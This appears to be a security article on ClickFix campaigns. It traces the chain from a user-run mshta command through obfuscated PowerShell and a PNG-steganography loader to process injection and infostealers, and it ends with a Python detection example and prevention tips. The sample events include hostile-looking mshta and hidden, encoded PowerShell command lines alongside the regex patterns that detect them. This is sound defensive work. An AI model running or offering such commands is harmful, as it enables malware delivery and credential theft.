ClickFix campaigns trick users into running an mshta command themselves, starting a multi-stage malware delivery chain that frequently ends with the Rhadamanthys infostealer.
Multi-Stage Execution
The attack begins when a malicious webpage prompts the user to execute an mshta command. That command fetches an obfuscated script which hides its download URLs as hex-encoded strings and rotates the paths it retrieves from. The script in turn runs further obfuscated PowerShell commands.
PowerShell then decrypts and loads a .NET assembly loader. This loader uses custom steganography to recover shellcode from PNG images, with the payload bytes stored in pixel color values, primarily the red channel.
Advanced Techniques
The shellcode is injected into trusted processes using standard process-injection APIs such as VirtualAllocEx and WriteProcessMemory. The final payloads are typically infostealers such as LummaC2 and Rhadamanthys.
Hiding the malware inside image files makes detection harder: nothing malicious is written to disk in recognizable form, and the payload is reconstructed entirely in memory from files that look innocuous.
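The first two links of the chain leave a recognizable trace in process-creation telemetry: mshta launched from a browser with a remote URL, then PowerShell spawned by mshta with a hidden window and an encoded command. The following detection logic is an added example, not code from the original article; the event records, file names and URLs are constructed for illustration.

```python
import re

# Constructed process-creation events (parent image, child image, command line).
# Hosts, paths and the encoded string are made up; they are not real indicators.
SAMPLE_EVENTS = [
    {"parent": "chrome.exe", "image": "mshta.exe",
     "cmd": "mshta.exe http://example.invalid/update/check"},
    {"parent": "mshta.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -w hidden -nop -ep bypass -enc SQBFAFgA"},
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmd": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmd": r"powershell.exe -File C:\scripts\backup.ps1"},
]

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}

# mshta handed a remote resource instead of a local .hta file
REMOTE_HTA = re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I)
# PowerShell invoked with an encoded command (-e, -ec, -enc, -EncodedCommand)
ENCODED_PS = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)


def classify(event):
    """Return the names of every detection that matches one process-creation event."""
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmd = event["cmd"]
    hits = []
    if image == "mshta.exe" and REMOTE_HTA.search(cmd):
        hits.append("mshta_remote_content")
    if image == "mshta.exe" and parent in BROWSERS:
        hits.append("mshta_spawned_by_browser")
    if image == "powershell.exe" and parent == "mshta.exe":
        hits.append("powershell_child_of_mshta")
    if image == "powershell.exe" and ENCODED_PS.search(cmd) and "hidden" in cmd.lower():
        hits.append("powershell_hidden_encoded")
    return hits


def scan(events):
    """Return (command line, detections) for every event that triggered at least one rule."""
    flagged = []
    for event in events:
        hits = classify(event)
        if hits:
            flagged.append((event["cmd"], hits))
    return flagged
```

Correlating the two flagged events by process lineage (mshta as the parent of the PowerShell child) gives a much stronger signal than either rule alone, since legitimate local .hta launches and scheduled PowerShell scripts match neither.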
Preventive Measures
To stay protected, users should not follow webpage prompts that urge them to run commands. Running scripts or commands from untrusted sources is discouraged, and typing a command by hand is preferable to pasting one from a webpage.
- Maintain updated security software with web protection
- Verify instructions through official support channels
- Educate yourself on emerging attack techniques